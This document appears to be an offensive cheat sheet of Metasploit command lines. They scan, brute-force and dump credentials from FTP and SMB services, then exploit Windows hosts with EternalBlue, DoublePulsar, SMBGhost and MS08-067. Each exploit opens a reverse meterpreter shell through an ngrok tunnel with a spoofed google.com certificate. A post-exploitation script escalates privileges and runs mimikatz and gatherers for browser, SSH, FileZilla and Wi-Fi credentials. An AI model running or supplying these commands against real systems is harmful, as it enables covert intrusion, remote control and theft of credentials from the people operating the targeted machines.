msfconsole -qx "
use auxiliary/scanner/ftp/ftp_version;
set RHOSTS $WEBSITE;
run;
exit"
Anonymous Login
msfconsole -qx "
use auxiliary/scanner/ftp/anonymous;
set RHOSTS $WEBSITE;
run;
exit"
Brute Force
msfconsole -qx "
use auxiliary/scanner/ftp/ftp_login;
set RHOSTS $WEBSITE;
set USERPASS_FILE /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt;
run;
exit"
msfconsole -qx "
use auxiliary/scanner/smb/smb_version;
set RHOSTS $TARGET;
run;
exit"
Enumerate Users
msfconsole -qx "
use auxiliary/scanner/smb/smb_enumusers;
set RHOSTS $TARGET;
run;
exit"
Enumerate Shares
msfconsole -qx "
use auxiliary/scanner/smb/smb_enumshares;
set RHOSTS $TARGET;
run;
exit"
Credential Dumps
msfconsole -qx "
use auxiliary/scanner/smb/impacket/secretsdump;
set RHOSTS $TARGET;
run;
exit"
Credential Brute Force
msfconsole -qx "
use auxiliary/scanner/smb/smb_login;
set RHOSTS $TARGET;
set SMBUser Administrator;
set PASS_FILE /usr/share/seclists/Passwords/darkweb2017-top100.txt;
run;
exit"
Detect EternalBlue
msfconsole -qx "
use auxiliary/scanner/smb/smb_ms17_010;
set RHOSTS $TARGET;
run;
exit"
Start Ngrok
ngrok http 4444 >/dev/null 2>&1 &
Define ENV Ngrok
NGHOST=$(curl -s http://127.0.0.1:4040/api/tunnels | jq -r .tunnels[0].public_url | sed 's|https://||')
Cert Spoof
rm -rf /home/$USER/.msf4/loot/*
msfconsole -qx "
use auxiliary/gather/impersonate_ssl;
set RHOSTS google.com;
run;
exit"
Define ENV Cert
CERT=/home/$USER/.msf4/loot/$(find /home/$USER/.msf4/loot/ -type f -name "*.pem" -printf "%f\n" | head -n 1)
Post-EXP
cat > /tmp/post-exp.rc << EOF
getprivs
getsystem
run multi/gather/firefox_creds DECRYPT=true
run multi/gather/filezilla_client_cred
run multi/gather/ssh_creds
run multi/gather/thunderbird_creds
run multi/gather/wlan_geolocate
mimikatz
privilege::debug
sekurlsa::logonpasswords
lsadump::sam
bg
EOF
EternalBlue Exploit (ÙŒWin 7 to 10 - Win Server 2008 to 2012)
msfconsole -qx "
use exploit/windows/smb/ms17_010_eternalblue;
set PAYLOAD windows/x64/meterpreter/reverse_https;
set RHOSTS $TARGET;
set LHOST $NGHOST;
set LPORT 443;
set ReverseListenerBindAddress 127.0.0.1;
set ReverseListenerBindPort 4444;
set HandlerSSLCert $CERT;
set StagerVerifySSLCert true;
set StageEncoder true;
set AutoRunScript /tmp/post-exp.rc;
run -j"
Doublepulsar Exploit (ÙŒWin 7 to 10 - Win Server 2008 to 2012)
msfconsole -qx "
use exploit/windows/smb/smb_doublepulsar_rce;
set PAYLOAD windows/x64/meterpreter/reverse_https;
set RHOSTS $TARGET;
set LHOST $NGHOST;
set LPORT 443;
set ReverseListenerBindAddress 127.0.0.1;
set ReverseListenerBindPort 4444;
set HandlerSSLCert $CERT;
set StagerVerifySSLCert true;
set StageEncoder true;
set AutoRunScript /tmp/post-exp.rc;
run -j"
SMBGhost Exploit (Win 10)
msfconsole -qx "
use exploit/windows/smb/cve_2020_0796_smbghost;
set PAYLOAD windows/x64/meterpreter/reverse_https;
set RHOSTS $TARGET;
set LHOST $NGHOST;
set LPORT 443;
set ReverseListenerBindAddress 127.0.0.1;
set ReverseListenerBindPort 4444;
set HandlerSSLCert $CERT;
set StagerVerifySSLCert true;
set StageEncoder true;
set AutoRunScript /tmp/post-exp.rc;
run -j"
Net API Exploit (Win XP's)
msfconsole -qx "
use exploit/windows/smb/ms08_067_netapi;
set PAYLOAD windows/meterpreter/reverse_hop_http;
set RHOSTS $TARGET;
set LHOST $NGHOST;
set LPORT 443;
set ReverseListenerBindAddress 127.0.0.1;
set ReverseListenerBindPort 4444;
set HandlerSSLCert $CERT;
set StagerVerifySSLCert true;
set StageEncoder true;
set AutoRunScript /tmp/post-exp.rc;
run -j"